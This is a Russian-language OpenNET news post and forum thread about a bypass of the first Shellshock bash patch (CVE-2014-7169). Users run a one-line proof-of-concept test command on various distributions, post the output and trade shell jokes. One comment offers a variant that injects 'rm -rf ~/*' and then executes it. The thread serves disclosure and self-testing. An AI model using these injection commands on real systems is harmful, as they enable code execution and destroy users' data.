The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Найдет способ обхода патча, устраняющего уязвимость в bash"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от opennews (??) on 25-Сен-14, 10:31 
Выявлены (https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_...) методы (CVE-2014-7169) обхода патча, представленного вчера для устранения критической уязвимости в Bash. Для решения проблемы подготовлен новый патч (http://www.openwall.com/lists/oss-security/2014/09/25/10). В дистрибутивах проблема пока остаётся неисправленной.

Для проверки на наличие обходного пути эксплуатации уязвимости можно (https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24) использовать (http://seclists.org/oss-sec/2014/q3/685) команду (успешно срабатывает после установки вчерашнего обновления bash в Ubuntu и Debian):


<font color="#461b7e">
   env X='() { (a)=>\' sh -c "echo date"; cat echo
</font>

Кроме того, уже проведены (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...) попытки массового сканирования серверов на предмет наличия уязвимости в Bash. Первый же эксперимент выявил около 3 тысяч хостов, подверженных уязвимости в Bash при запросе корневой страницы по IP, без заполнения заголовка Host (при полноценном сканировании с указанием корректных имён домена таких сайтов может оказаться в 50 раз больше). Организация целевых атак на конкретные CGI-скрипты, например, на /cgi-sys/defaultwebpage.cgi из CPanel позволяет как минимум её в 10 раз расширить область действия атаки. Так как уязвимость очень проста в эксплуатации не исключается появление в ближайшее время червей, нацеленных на поражение конкретных проблемных CGI-скриптов.


URL: https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24
Новость: http://www.opennet.me/opennews/art.shtml?num=40670

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +5 +/
Сообщение от Аноним (??) on 25-Сен-14, 10:31 
КСЖ. Все переходим на zsh?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

31. "Найдет способ обхода патча, устраняющего уязвимость в bash"  –7 +/
Сообщение от фыв (??) on 25-Сен-14, 13:36 
на dash
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

45. "Найдет способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от InuYasha on 25-Сен-14, 14:29 
+1
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

51. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Stax (ok) on 25-Сен-14, 15:14 
*
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

52. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Stax (ok) on 25-Сен-14, 15:20 
Переход вашего конкретного шелла ничего не даст - в нем такую уязвимость все равно не получится осмысленно использовать. Настоящая проблема в shell'ах, которые неявно вызывают различные системные сервисы - и в которые есть риск подсунуть выполнение произвольных команд - а от замены шелла конкретного пользователя там ничего не изменится.

Тут есть обзор с примерами, как эта уязвимость может эксплуатироваться через сервисы: https://securityblog.redhat.com/2014/09/24/bash-specially-cr.../

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

58. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 17:11 
Реальная проблема - кластерфак с экранированием и специальной интерпретацией всего чего можно. Это касается шелла, терминалов и прочего. Да, если вы копипастите совет из интернета - парочка неочевидных символов может заставить вашу терминалку сделать вовсе не то о чем вы подумали и вас постигнет волшебный хренакс.
Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

61. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Stax (ok) on 25-Сен-14, 18:23 
Только в этом случае опять же не имеет значения, какой у вас шелл. Будь у вас хоть супер-секьюрный dash, env X='() { (a)=>\' bash -c "echo date"; cat echo сработает, т.к. ломает свежезапущенный bash.
Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

66. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 19:09 
> Только в этом случае опять же не имеет значения, какой у вас шелл.

В случае hijack ввода через терминал - да, тип шелла пофигу. Не пофигу тип терминала. Вообще терминалы тоже некисло бы переделать с ноля и по людски. А не "на черно-зеленых ископаемых это было так, а потом все привыкли".

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

68. "Найдет способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Психиатр (ok) on 25-Сен-14, 20:00 
шшшшш тихо!
а то поцтеринг услышит
Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

102. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 17:15 
> а то поцтеринг услышит

Блин, надо ему написать, доджен же кто-то привести этот пи..ц в порядок. А ему уже привычно тумаки получать за такую работенку :)

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

116. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Stax (ok) on 27-Сен-14, 12:37 
>> а то поцтеринг услышит
> Блин, надо ему написать, доджен же кто-то привести этот пи..ц в порядок.
> А ему уже привычно тумаки получать за такую работенку :)

Мне кажется, не его специализация: ему демоны/подсистемы нравится писать (avahi, pulseaudio, systemd), а не программы для конечного пользователя или инструменты.

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

122. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 05-Окт-14, 09:08 
> шшшшш тихо!
> а то поцтеринг услышит

он спит


Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

76. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от Stax (ok) on 25-Сен-14, 21:00 
Ну есть, например, Terminology: http://enlightenment.org/p.php?p=about/terminology&l=en
Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

103. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 17:16 
> Ну есть, например, Terminology

В нем выпилили совместимость с древними терминалами, escape кодами и прочей мутью, позволяющей уйму внеплановой активности если за вводом недоглядеть?

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

73. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от GotF (ok) on 25-Сен-14, 20:43 
> Все переходим на zsh?

Угу. И сразу ждём поток CVE для Zsh :)

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

80. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от Аноним (??) on 25-Сен-14, 22:08 
> КСЖ. Все переходим на zsh?

Судя по монструозности zsh, ждать подобной уязвимости в его случае придётся ещё меньше. Тогда уже KSH, а лучше - dash или что-то столь же минималистичное.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от zeroDroid on 25-Сен-14, 10:39 
Переходим на ksh93 ))))))))))))))))))
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

47. "Найдет способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 25-Сен-14, 14:58 
csh ftw? :)
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

81. "Найдет способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 25-Сен-14, 22:19 
> csh ftw? :)

Вот вы все скрипты и переписывайте. Вместе с POSIX. :-\

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

111. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 18:46 
> Вот вы все скрипты и переписывайте. Вместе с POSIX. :-\

Да, скрипты это круто. Особенно когда вам ремотный DHCP сервер команд на выполнение подкинет, как на https://www.trustedsec.com/september-2014/shellshock-dhcp-rc.../

Нормальный такой метод поимения: ничего не надо - только на DHCP запрос ответить и получить шелл на системе. Как правило - рутовый.

Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

3. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Гость (??) on 25-Сен-14, 10:42 
> env X='() { (a)=>\' sh -c "echo date"; cat echo

А что должно получиться?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 10:50 
Дату вывести.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

13. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 11:17 
env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: Нет такого файла или каталога

кубунта с "вчерашним обновлением" :)

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

34. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 13:58 
У вас, видимо, sh - это dash, а не bash.

Не вводите людей в заблуждение.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

59. "Найдет способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 17:12 
> кубунта с "вчерашним обновлением" :)

Потому что надо было так: env X='() { (a)=>\' bash -c "echo date"; cat echo

Работает.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

9. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от ALex_hha (ok) on 25-Сен-14, 11:01 
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
Thu Sep 25 06:59:29 UTC 2014

так и задумано?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

32. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 13:45 
строка "Thu Sep 25 06:59:29 UTC 2014" находится в файле ./echo, появившемся в результате действия команды.
поэтому если выполнить эту команду в каталоге, в котором находится команда echo, от имени суперюзера - echo перестанет быть программой.
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

43. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 14:11 
> строка "Thu Sep 25 06:59:29 UTC 2014" находится в файле ./echo, появившемся
> в результате действия команды.
> поэтому если выполнить эту команду в каталоге, в котором находится команда echo,
> от имени суперюзера - echo перестанет быть программой.

 
> в результате действия команды

Дальше можно было и не продолжать. Зачем перезаписывать какое-то там echo, если мы можем выполнять любые команды?

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

54. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Michael Shigorin email(ok) on 25-Сен-14, 16:07 
> Дальше можно было и не продолжать. Зачем перезаписывать какое-то там echo,
> если мы можем выполнять любые команды?

Очевидно, это был терпеливый пример.  Более доходчивый по Бармину всё же стёр, хоть некоторые будут правы в том, что это негуманно по отношению к кандидатам на цифровой эквивалент премии Дарвина.

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

94. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от none_first (ok) on 26-Сен-14, 13:30 
типа такой? env X='() { (a)=>\' bash -c "test_ echo rm -rf ~/*"; . test_
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

10. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 11:07 
Kubuntu 14.04, после патча не работает:

> env X='() { (a)=>\' sh -c "echo date"; cat echo
> date
> cat: echo: No such file or directory

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

36. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Аноним (??) on 25-Сен-14, 14:00 
> Kubuntu 14.04, после патча не работает:
>> env X='() { (a)=>\' sh -c "echo date"; cat echo
>> date
>> cat: echo: No such file or directory

И до патча не должно, если sh = dash.

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

11. "Найден способ обхода патча, устраняющего уязвимость в bash"  –2 +/
Сообщение от CssfPZS (ok) on 25-Сен-14, 11:08 
OpenSUSE 13.1:

env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
Thu Sep 25 09:05:13 CEST 2014

CentOS 7:

env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
Thu Sep 25 09:04:28 CEST 2014

Получается, что не рпаботает.
>Для проверки на наличие обходного пути эксплуатации уязвимости можно использовать команду (успешно срабатывает после установки вчерашнего обновления bash в Ubuntu и Debian):

Это точно не дистрибутиво специфичный баг?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от h31 (ok) on 25-Сен-14, 11:25 
Это обходной путь, срабатывает, только если _уже_ установлен патч.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

15. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от CssfPZS (ok) on 25-Сен-14, 11:27 
На обеих машинах патч установлен.
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

21. "Найден способ обхода патча, устраняющего уязвимость в bash"  +4 +/
Сообщение от тигар (ok) on 25-Сен-14, 12:20 
> На обеих машинах патч установлен.

и тебя не смущает тот факт, что оно выводит дату?

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

60. "Найден способ обхода патча, устраняющего уязвимость в bash"  –3 +/
Сообщение от Аноним (??) on 25-Сен-14, 17:15 
> На обеих машинах патч установлен.

Вообще-то, пример сработал. Заметь, команда с датой - выполнилась. Что самое прикольное, фанату редхата это объясняют скрипткидисы от убунту и бсд :).

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

20. "Найден способ обхода патча, устраняющего уязвимость в bash"  +4 +/
Сообщение от Аноним (??) on 25-Сен-14, 12:20 
Работает, раз файл echo создаётся.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

23. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от CssfPZS (ok) on 25-Сен-14, 12:27 
> Работает, раз файл echo создаётся.

Ты прав

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

12. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Gadd on 25-Сен-14, 11:13 
Ubuntu 12.04
~$ env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: Нет такого файла или каталога

После вчерашнего патча, новый патч не ставил

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "Найден способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от neol (ok) on 25-Сен-14, 13:36 
Для Ubuntu/Debian работает так:
env X='() { (a)=>\' bash -c "echo date"; cat echo

Там sh смотрит на dash, в котором уязвимости нет.

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

48. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 15:05 
> Там sh смотрит на dash, в котором уязвимости нет.

Попробовал явно запустить /bin/bash, результат аналогичный.

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

49. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 25-Сен-14, 15:08 
> Попробовал явно запустить /bin/bash, результат аналогичный.

А, тормознул, надо bash еще и в самой конструкции. Вон та инструкция для бздунов работает и на убунтах. Pwnage такой pwnage...

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

17. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Умник on 25-Сен-14, 11:43 
FreeBSD

env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: No such file or directory

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

18. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Xaionaro email(ok) on 25-Сен-14, 12:11 
> FreeBSD

А причём тут FreeBSD? Или намёк на то, что в их ports уже давно используется patch для bash, который исправляет эту проблему?

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

22. "Найден способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от тигар (ok) on 25-Сен-14, 12:22 
>> FreeBSD
> А причём тут FreeBSD? Или намёк на то, что в их ports
> уже давно используется patch для bash, который исправляет эту проблему?

не поверишь, но вчерашний патч для ЭТОГО там есть, в портах, да.

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

50. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Xaionaro email(ok) on 25-Сен-14, 15:13 
>>> FreeBSD
>> А причём тут FreeBSD? Или намёк на то, что в их ports
>> уже давно используется patch для bash, который исправляет эту проблему?
> не поверишь, но вчерашний патч для ЭТОГО там есть, в портах, да.

Он там появился до данной новости или после?

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

56. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от тигар (ok) on 25-Сен-14, 16:19 
>>>> FreeBSD
>>> А причём тут FreeBSD? Или намёк на то, что в их ports
>>> уже давно используется patch для bash, который исправляет эту проблему?
>> не поверишь, но вчерашний патч для ЭТОГО там есть, в портах, да.
> Он там появился до данной новости или после?

r369185 2014-09-24 20:05:47 +0300

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

69. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Xaionaro (ok) on 25-Сен-14, 20:01 
Ну так бы и написали, что в портах FreeBSD проблема была устранена r369185 2014-09-24 20:05:47 +0300..

IMO, было совершенно непонятно, что вы хотели сказать в своём первом комментарии.

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

79. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от тигар (ok) on 25-Сен-14, 21:56 
> Ну так бы и написали, что в портах FreeBSD проблема была устранена
> r369185 2014-09-24 20:05:47 +0300..
> IMO, было совершенно непонятно, что вы хотели сказать в своём первом комментарии.

прошу прощения, как-то не привычно, когда на данном ресурсе спрашивают просто потому что интересно, а не чтобы подколоть:)

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

41. "Найден способ обхода патча, устраняющего уязвимость в bash"  +7 +/
Сообщение от Аноним (??) on 25-Сен-14, 14:05 
> А причём тут FreeBSD? Или намёк на то, что в их ports
> уже давно используется patch для bash, который исправляет эту проблему?

Это намек на то, что фрибсдшники не понимают разницы между bash и sh.

А как еще объяснить то, что на баш-специфичную уязвимость они тестируют именно sh?

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

71. "Найден способ обхода патча, устраняющего уязвимость в bash"  –4 +/
Сообщение от Куяврег on 25-Сен-14, 20:17 
а убунтохомяки всё осваивают телепатию. и что характерно - всё неудачно.
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

109. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 18:24 
> а убунтохомяки всё осваивают телепатию. и что характерно - всё неудачно.

Еще один образчик годного батхерта. Хомяки vs снобы: 2:0 :)

Ответить | Правка | ^ к родителю #71 | Наверх | Cообщить модератору

28. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Аноним (??) on 25-Сен-14, 13:02 
Для фряхи и всем тем, у кого /bin/sh это не баш, нужно заменить в приведенной команде sh на bash:

env X='() { (a)=>\' bash -c "echo date"; cat echo

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

101. "Найден способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от Аннонннн on 26-Сен-14, 15:59 
$ uname -rs
FreeBSD 10.0-RELEASE-p9

$ echo $BASH_VERSION
4.3.25(1)-release

$ bash --version
GNU bash, version 4.3.25(1)-release (i386-portbld-freebsd10.0)
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

$ env X='() { (a)=>\' bash -c "echo date"; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
date
cat: echo: No such file or directory

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

24. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 12:47 
А я уже давно сделал так:
# emerge dash eselect-sh
# eselect sh set dash
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 12:48 
[ebuild     U  ] app-shells/bash-4.2_p48-r1 [4.2_p48]

env X='() { (a)=>\' sh -c "echo date"; cat echo
sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
date
cat: echo: Нет такого файла или каталога

:P

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

26. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 25-Сен-14, 12:49 
Думаю, надо написать новый шелл для системдос, а баш выкинуть.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

37. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Andrey Mitrofanov on 25-Сен-14, 14:01 
> Думаю, надо написать новый шелл для системдос, а баш выкинуть.

ЛенартОСу не нужен шелл. Можно выкидывать сразу! ><//////>

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

38. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 14:01 
> Думаю, надо написать новый шелл для системдос, а баш выкинуть.

В системдос не должно быть шелла, ибо лишний вектор уязвимости, и Леннарт не одобряет.

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

44. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Andrey Mitrofanov on 25-Сен-14, 14:13 
>> Думаю, надо написать новый шелл для системдос, а баш выкинуть.
> В системдос не должно быть шелла, ибо лишний вектор уязвимости, и Леннарт
> не одобряет.

Не, уязвимсость это новое. Основная архитектурная идея s-d ещё c самого начала была "любую проблему можно решить конфигом из 5 строчек(*1), поэтому bash^Wшелл не нужен".

(*1) формата VAR$n=$m, где n&m - правильно подобранные под задачу целые(*2).
(*2) разрядность не уточняется.

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

125. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 08-Окт-14, 18:11 
>>> Думаю, надо написать новый шелл для системдос, а баш выкинуть.
>> В системдос не должно быть шелла, ибо лишний вектор уязвимости, и Леннарт
>> не одобряет.
> Не, уязвимсость это новое. Основная архитектурная идея s-d ещё c самого начала
> была "любую проблему можно решить конфигом из 5 строчек(*1), поэтому bash^Wшелл
> не нужен".

Ну, продолжай цепочку дальше! "Потому, что линуксойды относятся к разновидности хомо, именуемой No_Script и скрипты не умеют даже читать, не то, что писать". :))))))

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

130. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Andrey Mitrofanov on 08-Окт-14, 18:45 
>поэтому bash^Wшелл не нужен".
> Ну, продолжай цепочку дальше! "Потому, что линуксойды относятся к разновидности хомо, именуемой
> No_Script и скрипты не умеют даже читать, не то, что писать".
> :))))))

Немедленно патчите броузер! У вас тэг сарказьм http:/openforum/vsluhforumID3/99256.html#29 в нём сломан -- уязвимость. //Ну или комбо "двойной сарказм" не удалось. Тренеруйтесь ещё!

Ответить | Правка | ^ к родителю #125 | Наверх | Cообщить модератору

55. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Шерлок Холмс из Опеннета on 25-Сен-14, 16:15 
test -d /run/systemd && echo "vulnerable"
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

27. "Найден способ обхода патча, устраняющего уязвимость в bash"  –7 +/
Сообщение от Аноним (??) on 25-Сен-14, 12:59 
> успешно срабатывает после установки вчерашнего обновления bash в Ubuntu и Debian

Как бэ статистика опеннета говорит об обратном. Успешно он сработал на Сюсе и ЦентОс, а как раз на Убунтах, Генту и ФриБСД он не срабатывает.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

29. "Найден способ обхода патча, устраняющего уязвимость в bash"  +3 +/
Сообщение от Аноним (??) on 25-Сен-14, 13:09 
>> успешно срабатывает после установки вчерашнего обновления bash в Ubuntu и Debian
> Как бэ статистика опеннета говорит об обратном. Успешно он сработал на Сюсе
> и ЦентОс, а как раз на Убунтах, Генту и ФриБСД он
> не срабатывает.

В генту пофиксили сегодня только около 10 утра - выкатили апдейт сразу в стейбл. В дебе/убунте /bin/sh разве не симлинк на dash по дефолту, или это изменение они уже откатили? Я просто не в курсе. Во фре /bin/sh - это стопроцентно не баш, так что меняйте в приведенной в посте команде sh на bash.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

119. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 28-Сен-14, 15:34 
>Во фре /bin/sh - это стопроцентно не баш, так что меняйте в приведенной в посте команде sh на bash.

но у меня bash не установлен на FreeBSD.
т.е. для активации уязвимости мне необходимо сначала поставить bash из портов?

--
вы бы тогда уточняли, что это только для тех, у кого установлен bash.

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

39. "Найден способ обхода патча, устраняющего уязвимость в bash"  +3 +/
Сообщение от Аноним (??) on 25-Сен-14, 14:03 
> Как бэ статистика опеннета говорит об обратном. Успешно он сработал на Сюсе
> и ЦентОс, а как раз на Убунтах, Генту и ФриБСД он
> не срабатывает.

Статистика говорит о том, что на Убунту и ФриБСД сидят скрипт-киддисы, которые втупую запускают тесты, не вдумываясь в их смысл. И не в курсе, что sh - это далеко не всегда bash.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

72. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Куяврег on 25-Сен-14, 20:40 
> Статистика говорит о том, что на Убунту и ФриБСД сидят скрипт-киддисы, которые
> втупую запускают тесты, не вдумываясь в их смысл. И не в
> курсе, что sh - это далеко не всегда bash.

не надо проецировать свои проблемы на других.

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

104. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 17:55 
> не надо проецировать свои проблемы на других.

Диагностирован батхерт :)

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

113. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Гость (??) on 26-Сен-14, 21:49 
От тебя большего и не ждали.
Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

91. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 26-Сен-14, 11:12 
Даже если предположить, что все Убунтоиды, ФриБСДшники и Гентумены ничего не знают(вы сами в это реально верите?) то это значит, что баш они не используют/удалили/не ставили и ложили они на эту уязвимость.
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

33. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 13:48 
в tcsh тоже срабатывает - не только в bash.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

40. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Andrey Mitrofanov on 25-Сен-14, 14:05 
> в tcsh тоже

Нам ждать ещё и Hовостей "И я тоже!" от череды само-раскапывающихся xxxsh-стюардесс? Оживляж!

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

46. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от vitalif email(ok) on 25-Сен-14, 14:55 
Молодцы, обошли. А фиксить-то будут?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

75. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 20:57 
Наверное нет.
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

53. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 25-Сен-14, 15:54 
Где фикс??? А-а-а-а, мы все умрём!!!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

64. "Найден способ обхода патча, устраняющего уязвимость в bash"  +3 +/
Сообщение от XoRe (ok) on 25-Сен-14, 19:06 
> Где фикс??? А-а-а-а, мы все умрём!!!

Вы так говорите, как будто это что-то плохое

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

70. "Найден способ обхода патча, устраняющего уязвимость в bash"  –5 +/
Сообщение от Аноним (??) on 25-Сен-14, 20:02 
сила и мощь опенсорца: дыра есть, а исправлять её некому
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

